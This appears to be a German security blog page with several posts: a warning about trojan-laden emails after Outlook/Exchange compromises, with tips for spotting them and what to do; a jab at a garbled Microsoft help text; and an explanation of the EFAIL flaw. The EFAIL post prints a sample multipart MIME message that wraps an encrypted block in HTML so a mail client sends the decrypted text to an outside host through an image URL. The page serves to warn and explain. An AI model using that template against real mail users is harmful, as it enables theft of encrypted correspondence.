ALARMSTUFE GELB – vermehrte Trojaner Emails durch Hack von Outlook / Exchange Mailservern

Da jetzt 2 Mails in 2 Tagen aufgetaucht sind, die Trojaner enthalten und dem gleichen Schema folgen, und wir von mehr wissen, muß ich folgende Warnung abgeben:

Achten Sie dringend darauf:
KEINE ATTACHMENTS ANKLICKEN/SPEICHERN/AUSFÜHREN .

 

Die Trojaner Emails sind an folgendem Muster erkennbar

ZIP Attachment mit 4-5 Buchstaben als Filename.

Der Inhalt der Email knüpft an eine Korrespondenz an, die Ihr mit einem Kontakt früher hattet.

I.d.R. so was: „Ich habe Ihnen gestern ein Dokument gesendet. Ist es dir angekommen?“

UND Umlaute gibts nicht mehr im Text, es gibt Buchstabendoppler und andere Bugs:

Sehr geehrte Projektbeteiligte,
im Anhang erhalten Sie das Protokoll Nr.: 208/AA 012 zur Baubesprechung vom 01.11.2024 zu Ihrer Kenntnisnahme und frIhre Unterlagen.
Termin der nchsten Baubesprecchng 019:
Bei Rckfrgen stehen wir Ihnen gerne zurr Verfgung.
Mit freundlichen Gren

MAßNAHMEN:

  1. Attachment mit der rechten Maus anklicken -> Anhang löschen
  2. Mail nicht löschen, zwecks Beweissicherung. Kann nach 6 Monaten weg.
  3. echten Kontakt über bekannte! Kontaktwege informieren, daß deren Outlook/Exchange gehackt wurde:

Diese Links mitschicken:

https://thehackernews.com/2024/02/critical-exchange-server-flaw-cve-2024.html

http://blog.fefe.de/?ts=9b3393bb

https://krebsonsecurity.com/2024/02/fat-patch-tuesday-february-2024-edition/

Weil:

Rapid7’s lead software engineer Adam Barnett highlighted CVE-2024-21413, a critical remote code execution bug in Microsoft Office that could be exploited just by viewing a specially-crafted message in the Outlook Preview pane.

Narang called special attention to CVE-2024-21410, an “elevation of privilege” bug in Microsoft Exchange Server that Microsoft says is likely to be exploited by attackers. Attacks on this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

Brian Krebs kommentiert dazu:

BrianKrebs @briankrebs

„IDK when Microsoft knew what, but this was definitely a vulnerability that was going to get reverse engineered and pounced on. It’s a scroll-your-Outlook-inbox-and-get-pwned bug. This could get bad quick.“

Und Ja, Brian Krebs hat recht, die Hütte brennt lichterloh!

LIEGT DER HACK BEI IHNEN?

Wenn Sie Outlook einsetzen, dann stellen Sie sicher, daß es alle Updates bekommen hat. Wenn Sie nicht auf dem neuesten Stand sind, könnten Sie betroffen sein. Wir empfehlen sofort auf Thunderbird umzusteigen, sollten keine Updates einspielbar sein.

Die Anzahl der Hacks in Emails im Zusammenhang mit den Outlook/Exchange Hacks nimmt rapide zu.

Daher kontaktieren Sie Ihre IT, informieren diese ggf. mit den obigen Links und lassen Sie alles Updaten.

Outlookwahnsinnshinweis

Ok, das Microsoft in diesem Blog meistens nicht gut wegkommt wird dem einen oder anderen Besucher  klar sein. Für alle anderen habe ich das für Euch rausgefischt :

Hilfeseiten von Microsoft

Hier ein Original von heute :

„Hinweis: Wenn Ihr IMAP-Ordner der obersten Ebene einen Namen,
der mit einer Ziffer (0-9) beginnt hat, klicken Sie dann werden Sie
kann nicht zum Ausführen dieser Schritte aufgrund einer aktuellen
 Problem mit Outlook. Dieses Problem wird momentan ermittelt und
 in diesem Artikel wird aktualisiert, wenn das Problem behoben wurde.“

LINK: https://support.office.com/de-de/article/ausw%C3%A4hlen-der-in-outlook-angezeigten-imap-kontoordner-32103602-a568-4499-9d25-54fe236aee6a

Das Problem wird nie ermittelt und behoben.. NIEMALS!  Es versteht doch gar keiner bei dem Kauderwelsch! 😀

Um was gings wirklich?

Wer Outlook benutzt und ein IMAP Konto hat und einen Ordner z.b. „1 Hilfen“ oder „2019 Rechnungen“ nennt, der bekommt ggf. Probleme, weil Outlook die Unterordner nicht sauber synchronisiert. Ich habe keine Vorstellung davon, wie ein Programmcode aussehen könnte, der abhängig davon, daß die erste Stelle im Namen eines Ordners eine Ziffer ist, solch einen Bug produziert; und ich habe schon viel Schrottcode gesehen. Aber das muß ein Fail epischen Ausmaßes sein, genau wie die deutsche Übersetzung von M$ oben  😀

EFail: Die Katze ist aus dem Sack

Die Katze ist aus dem Sack, das Whitepaper zur EFAIL Schwachstelle ist bekannt. Als Entwickler auch von komplexen Programmen zum Parsen von (auch abgedrehten) Formaten, kann ich Euch sagen, daß es genug Scheisse da draußen gibt, die man fehlertolerant behandeln kann, aber die EFAIL Schwachstelle ist genau das : EIN MEGAFAIL!

Selbstgemachtes GPG Schwachstellen Logo 🙂

EFail – Der MEGAFAIL

Der Exploit basiert darauf, daß man eine verschlüsselte Email an den Empfänger A abgefangen hat, diese aber nicht dekodieren kann. Das bleibt auch nach der Lücke so! Also PGP/GPG sind an sich fein raus, die haben gar keine Schuld an der Sache.

Nun bettet man den verschlüsselten Block der Mail in eine Multipart-Mime Message, die aus zwei HTML und einem Cipherblock (dem verschlüsselten Mailteil) besteht. Das könnte so aussehen:

From: <unverdächtig@kenneich.de>
To: <opfer@opfer.de>
Content-Type: multipart/mixed;boundary="GRENZE"

--GRENZE
Content-Type: text/html;charset=ascii

<html><body><img src="https://efail.de/
--GRENZE
Content-Type: application/pkcs7-mine;smine-type=enveloped-data
Content-Transfer-Encoding: base64

hQIMA+PS/5obaKVzARAAuG0PvUFHEzRp+U9HAm1GgjnUwy6afP60q0QYl9vWby5h
ysIVpoXrHZqn3H8f/+FjsoZ2YpDlCqhvKzn/UaP8kxb21YN1+eSaMi55b6WFyIif
hbxnp2Z155YM6Sx+VrTa55DQEF2c7LzyFKcE1csRiB0py+bWJKFPERRhXxSVOMpv
sZB3oLcZmBS990RgjbGUUZhXClxubwwqXo3K41Wj8kktQvZ7YD6hMz46V26kN4Ru
PLt1PQ/+P0iznlNjXaIckLXUq/RNpRMC5469Dp674OECZ2kc3fFrv5zkZcs0Kg5r
...
--GRENZE
Content-Type: text/html;charset=ascii

"></body></html>
--GRENZE--

Was jetzt passiert ist, daß der Mimeparser des Emailprogramms, den verschlüsselten Block vom PGP Plugin dekodieren läßt und nahtlos in das umgebende HTML einfügt. Es kommt dann eine URL raus wie => „https://efail.de/TEXT+DER+NACHRICHT+AN+DEN+EMPFÄNGER“, welche als Bild in dem HTML eingebettet ist, was die meisten Mailprogramme dazu bringt, diese sofort zu rendern. Also schickt der Client damit eine Bildanfrage und überträgt so die dekodierte Nachricht.

Voraussetzungen

1. Man braucht eine verschlüsselte Email an den Empfänger
2. Man braucht einen Webserver, der mehr als 512 Zeichen in der URL annimmt ( selbstschreiben vermutlich)
3. Man braucht ein Emailprogramm beim Opfer, dessen Parser von einem Irren geschrieben wurde
UND 4. das ungefragt Bilder von externen unbekannten Webseiten nachlädt.

1+2 kann der Angreifer liefern, 3+4 muß das Opfer beisteuern.

Der Pressetenor

Der allgemeine Pressetenor war heute, daß die Plugins einen Bug haben. Wenn aber obiges so zutrifft, dann haben die Plugins keinen BUG, sie sind nur zwingend notwendig, daß der Angriff automatisch ablaufen kann. Schaltet man die aus, läuft der Angriff ins Leere.

Was in einigen Webseiten aber abgeleitet wurde war, daß die Verschlüsselung geknackt wurde und das trotz monatelanger Vorwarnung, die Emailprogramme keinen Schutz dagegen gefunden haben.

Das aber ist LÄCHERLICH.

Hier wird wiedermal eine Sau durchs Dorf getrieben, die es nicht verdient hat. Ja, das Ganze ist ein Bug. Ja, der ist in der Wirkung echt schlimm. Nein, die Verschlüsselung wurde nicht geknackt, die wurde nur vom Emailprogramm automatisch aufgehoben und exfiltriert und genau da liegt der Hund begraben. Wie kann man nur einen Parser bauen, der die drei Teile einer Email, die als DREI Teile in der Email vorliegen, zu einem Teil zusammen fassen? Das ist die Frage.

Die, die den Parser geschrieben haben, der die drei Teile verbindet, die sollten ihre Studiengebühren zurück bekommen, sofern sie welche gezahlt haben!

Schlimmer ist nur noch, daß mindestens drei unterschiedliche Teams den gleichen Fehler gemacht haben.

Updates

Thunderbird wird erst mit einer Version 52.8 nicht mehr verwundbar sein. Ich nehme mal an, die Version kommt jetzt etwas zügiger raus, als geplant.